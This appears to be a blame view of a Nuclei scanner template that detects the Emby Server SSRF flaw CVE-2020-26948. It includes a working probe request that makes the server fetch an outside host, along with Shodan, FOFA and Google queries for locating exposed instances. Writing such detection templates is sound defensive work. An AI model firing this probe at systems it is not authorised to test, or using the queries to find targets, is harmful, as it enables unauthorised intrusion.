2021-03-02 02:53:18 +00:00
|
|
|
id: CVE-2020-26948
|
|
|
|
|
|
|
|
info:
|
2022-03-29 10:33:49 +00:00
|
|
|
name: Emby Server Server-Side Request Forgery
|
2021-03-02 02:53:18 +00:00
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
2022-04-22 10:38:41 +00:00
|
|
|
description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.
|
2023-09-06 12:22:36 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or upgrade to a patched version of Emby Server.
|
2022-03-29 10:33:49 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/btnz-k/emby_ssrf
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-26948
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
|
|
- https://github.com/Live-Hack-CVE/CVE-2020-26948
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-26948
|
|
|
|
cwe-id: CWE-918
|
2024-03-23 09:28:19 +00:00
|
|
|
epss-score: 0.1449
|
|
|
|
epss-percentile: 0.95606
|
2023-09-06 12:22:36 +00:00
|
|
|
cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: emby
|
|
|
|
product: emby
|
2024-05-31 19:23:20 +00:00
|
|
|
shodan-query: http.title:"emby"
|
|
|
|
fofa-query: title="emby"
|
|
|
|
google-query: intitle:"emby"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2020,cve,emby,jellyfin,ssrf
|
2021-03-02 02:53:18 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-03-02 02:53:18 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-03-02 07:52:26 +00:00
|
|
|
- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-03-02 02:53:18 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|
2021-03-02 02:53:18 +00:00
|
|
|
words:
|
|
|
|
- "Name or service not known"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-03-02 02:53:18 +00:00
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: header
|
2021-03-02 02:53:18 +00:00
|
|
|
words:
|
|
|
|
- "text/plain"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 500
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 490a004630440220188b47530029da65c0cb5d784be49ec43adf43b570dd3393bb805a6c0247e42002204d833e981c82ee0b3f2cd4f6cbc6a03f072dc0a091250d4dc74817b28c8446a2:922c64590222798bb761d5b6d8e72950
|